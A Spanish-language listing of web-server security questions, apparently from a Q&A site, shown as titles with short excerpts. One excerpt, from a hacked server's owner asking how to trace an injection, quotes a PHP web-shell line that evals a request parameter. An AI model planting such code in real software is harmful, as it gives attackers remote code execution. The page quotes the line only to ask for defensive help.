Preguntas con etiqueta 'webserver'

preguntas con etiqueta
1
respuesta

Protección de recursos estáticos del sitio web

Si tengo un sitio web al que solo se puede acceder mediante la autenticación en una página de inicio de sesión, ¿es posible que una persona no autenticada tenga acceso a activos estáticos (imágenes, css, javascript, ...)? Me imagino que la ún...
hecha 14.08.2013 - 21:16
2
respuestas

¿Cuáles son los problemas de seguridad al exponer la página de inicio del servidor predeterminado en Internet público?

He visto en Internet donde varias compañías de sitios web han expuesto la página de inicio predeterminada del servidor web, como Tomcat, NGNIX, el servidor web Apache. Siempre creo que no es la mejor práctica exponer la página del servidor web p...
hecha 20.09.2018 - 07:20
1
respuesta

¿Las descargas de Aria2 son detectables por los servidores web?

Hace un par de meses me inscribí en un curso en línea pagado. Sus términos de servicio indican que estas video conferencias son para verlas en streaming y no para descargarlas. Hay un viaje de 2 horas desde mi casa al trabajo y de regreso. Recie...
hecha 05.05.2018 - 15:01
1
respuesta

¿Nombre común del certificado del cliente? Asunto nombre alternativo?

Para un proyecto de IoT, quiero asegurar la comunicación del servidor cliente. Quiero que tanto el servidor (Apache) como los clientes se identifiquen / autentiquen entre sí (un cliente no se comunicará con otros clientes) antes de que los clien...
hecha 03.09.2018 - 22:09
1
respuesta

Pila entrante de WordPress visitada "localhost" en AWS

Estoy probando un servidor web en una instancia de aws EC2, tiene una pila de wordpress. El dominio está configurado correctamente, la estática pública (ip elástica) se redirige al dominio principal, así como a los dns públicos aws. Por lo tanto...
hecha 10.02.2018 - 14:07
1
respuesta

Nuevos archivos que aparecen en mi servidor web (no los creé)

Recientemente tuve un registrador de teclas en mi computadora que registra nombres de usuario y contraseñas, incluidas sus respectivas direcciones web. He cambiado todas mis contraseñas, sin embargo, en mi cuenta de alojamiento web, en el FTP, h...
hecha 15.10.2017 - 00:40
3
respuestas

¿Cómo puedo determinar de dónde provino el script inyectado?

Tengo un servidor que actualmente ha sido hackeado. Se están creando archivos en mi servidor que tiene contenido de este tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O como esto: <?php /*auV*...
hecha 20.07.2017 - 13:25
1
respuesta

Posibles riesgos adicionales de usar Docker en servidores de producción

¿Cuáles son los riesgos de seguridad agregados de usar un contenedor acoplado para implementar un servidor de producción? No está interesado en los riesgos que existirían de todos modos en la implementación de un servidor de producción de l...
hecha 07.09.2017 - 10:15
1
respuesta

Cómo almacenar la clave privada de CA de openssl de forma segura [duplicado]

Estamos en la fase de implementación de certificados SSL para el acceso de UI a nuestros componentes (tenemos una CA raíz a la que enviamos el CSR generado en openSSL) y nos preguntamos dónde sería el lugar más adecuado para almacenar el priva...
hecha 23.08.2017 - 14:44
1
respuesta

Alternativas a la autenticación básica y compacta en HTTP cuando los recursos están limitados

Actualmente estoy implementando un pequeño servidor web en una plataforma integrada que tiene recursos muy limitados. Estoy planeando utilizar una comunicación no segura porque TLS podría no ser posible en mi entorno integrado, pero sin embargo...
hecha 04.07.2017 - 09:52